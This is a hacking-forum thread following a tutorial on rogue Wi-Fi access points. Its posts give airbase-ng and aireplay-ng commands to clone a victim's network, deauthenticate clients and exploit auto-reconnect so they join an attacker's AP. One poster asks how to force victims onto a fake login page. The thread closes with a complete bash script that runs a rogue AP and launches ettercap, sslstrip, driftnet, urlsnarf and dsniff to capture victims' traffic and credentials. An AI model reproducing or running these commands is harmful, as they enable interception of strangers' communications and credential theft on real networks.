Lucafa's tutorial: softAP with internet connection and MITM sniffing

[purehate]

You guys totally hijacked Lucifer's thread.

[halfdone]

Nice tutorial. I'm not sure if it works yet, If it does I think I'll put into a shell script to speed up the process. How would you change the fake login page that the victim is forced to into being directed to?

Have anyone did that - how to create fake login page and force victims to it?

[mikeyxb]

when using airebase i use this command to setup the ap

Code:

sudo airbase-ng -c 11 -a (Mac address of router) -e (access point name) -z 2 -W 1 -F capture mon0

and this to deauth them

Code:

sudo aireplay-ng -0 10 -a (mac of router) -c (client accesspoint) mon0

i am a complete newb at this and i put this together myself, not sure what to do after it as im using ubuntu and am downloading bt4 for better results but i had a succesfull connection from an auto connect after using the first command to set up ap and then death to force reconnect to my ap have not got as far as trying to sniff yet

[enc0de]

Hey best (HOW TO) yet I gave it 5 stars. One question though I was watching the creators of airdrop and I'm still kinda of confused on how to right the rules I'm pretty sure I'll get once I use it but a little advice never hurts.

[Lucifer]

- kherkhere; this tutorial is not for sniffing wireless encryption keys.

- halfdone; search for g0tmi1k's bt4pre-final script, or maybe nick the greek his script. I do have to mention that both these scripts weren't working for me personally.

- mikeyxb; get BT4Final instead of ubuntu. And if you're a 'complete newb' like you've said yourself, then start off with the very basics like in my tut, aka airbase-ng -e wifree mon0

- enc0de; glad you like it. try airdrop-ng --help, and read through it carefully. I couldn't explain it any better.

good luck guys

[Lucifer]

for those who've been messing with fake ap's, it's really important that you understand the following:

this is an example:

a client 'A1' is connected to his AP 'AA' with essid 'wireless' and WEP key '123456'
if you now would deauth this client from his AP and setup a fake AP like:
airbase-ng -e wireless -W 1 mon0
then the client would reconnect to your fake AP since the correct essid and WEP flag is set, but the problem would be that the client is sending his packets encrypted with the key '123456' and airbase cannot decrypt since you didn't specify a key. the windows/mac client(victim) associated because the essid and encryption matches his real AP, BUUUT no communication between fake AP and client possible since you didn't specify the key airbase should use to decrypt the packets. failure.

having said this, in this example, you would need to start airbase this way:
airbase-ng -e wireless -w 123456 mon0

correct essid, correct WEP key the client is using + deauth the client with airdrop from his real AP => victim instant connects to your fake ap, aka succes

you could ofcourse, in this example, set airbase-ng -e wireless mon0 and wait for the victim to manually connect to your fake ap, but that can take ages. it's all about the windows/mac auto-reconnect function, which only cares about the essid and the encryption to reconnect, get it.

I hope that makes some sense as this principle is fundamental for windows/mac victims.

NOTE: this only applies to WEP clients, since it's not possible to set WPA encryption in airbase yet. for WPA clients, you can only set the correct essid in airbase and wait untill the client manually connects to your fake ap, but again, this can take ages and requires clients that are stupid.

[mikeyxb]

right ok i have sussed this one now but is it possible to get the client to connect to my proxy for the internet connection, i use my adb android localhost proxy on port 8080, so i will be connecting the client to my fake ap with that proxy as the internet access, would everything be the same or would it need some extra command lines somewhere in the conf file. and to use apt i have to do this command

Code:

export http_proxy=http://localhost:8080

would i have to put that inplace somewher of not

[ap/dc]

Hi Lucifer!

I have followed you tutorial and it is almost made it through
My issue is that when I'm done clients can connect and get`s dhcp but not Internet...

I have checked several times that my gateway(192.168.0.1) and interfaces(eth1 & wlan0/mon0) is correct.
Internet on the host machine(bt4) is working.

Do you have any clues?

[Lucifer]

mikeyxb; I'm afraid this goes beyond my knowledge aswell, ask a bt guru

ap/dc; what wireless card are you using?

A: Make sure you've got what's NEEDED(look at the beginning of my tutorial)

B: Try playing around with your wireless card's MTU values
(ifconfig wlan0 MTU 1400, 1500 or 1800, and ifconfig mon0 MTU 1400, 1500, or 1800, mess around with some combinations)

C: Maybe the MITM tools are causing you trouble. try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all tutorial's steps on this different machine to see if it helps. I've also got some problems with fake ap's on my laptop, it only works on my older pc.

EDIT: also play around with the at0 MTU value.

cheers,

[l3g10n]

#!/bin/bash #-------------- - Wifi WMITM Attack - n3n4umxc - Pastebin.com

#----------------------------------------------------------------------#
# This script is what I have taken from a script I found on the old BT
# forums by Deathray. I modified it to fit my needs. -l3g10n
#----------------------------------------------------------------------#
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
airmon-ng
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcp3-server/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up

modprobe tun

echo Airbase-ng is going to create our fake AP with the SSID we specified
xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &

sleep 10

echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;" >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;" >> dhcpd.conf
echo "log-facility local7;" >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
echo "option routers 10.0.0.1;" >> dhcpd.conf
echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
echo "}" >> dhcpd.conf

echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
xterm -e tail -f /var/log/messages &
#echo 'Launching ettercap, poisoning all hosts on the at0 interface's subnet'
xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
sleep 8

echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward

echo 'Launching various tools'
xterm -e sslstrip -a -k -f &
driftnet -v -i at0 &
xterm -e urlsnarf -i at0 &
xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &